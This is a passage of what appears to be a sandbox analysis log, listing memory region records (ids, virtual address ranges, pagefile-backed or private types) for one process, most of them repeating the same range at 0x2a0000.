"pagefile_0x00000000002a0000" filename = "" Region: id = 12357 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12358 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12359 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12361 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12362 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12363 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12364 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12365 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12366 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12367 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12368 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12369 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12370 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12371 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12372 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12373 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12374 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12375 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12376 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12377 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12378 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12379 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12380 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12381 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12382 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12383 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12384 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12385 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12386 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12387 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12388 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12389 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12390 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12391 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12392 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12393 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12394 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12395 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12396 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12397 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12398 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12399 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12400 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12401 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12402 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12403 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12404 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12405 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12406 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12407 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12408 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12409 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12410 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12411 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12412 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12413 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12593 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12594 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12595 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12596 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12597 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12598 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12599 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12600 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12601 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12602 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12603 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12604 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12605 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12606 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12607 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12608 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12609 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12610 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12611 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12612 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12613 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12614 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12615 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12616 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12617 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12618 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12619 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12620 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12621 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12622 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12623 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12624 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12625 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12626 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12627 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12628 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12629 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12630 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12631 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12632 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12633 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12634 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12635 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12636 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12637 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12638 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12639 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12640 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12647 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12648 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12649 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12650 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12651 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12652 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12653 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12654 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12655 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12657 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12658 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12659 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12660 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12661 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12662 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12663 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12664 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12665 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12666 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12667 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12668 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12669 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12670 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12671 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12672 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12673 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12674 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12675 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12676 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12677 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12678 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12679 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12680 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12681 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12682 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12683 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12684 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12685 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12686 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12687 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12688 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12689 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12690 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12691 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12692 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12693 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12694 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12727 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12728 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12729 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12730 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12731 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12732 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12914 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12915 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12916 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12917 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12918 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12919 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12920 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12921 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12922 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12923 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12924 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12925 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12926 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12927 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12928 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12929 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12930 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12931 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12932 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12933 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12934 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12935 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12936 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12937 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12938 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12939 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12940 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12941 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12942 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12943 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12944 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12945 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12946 start_va = 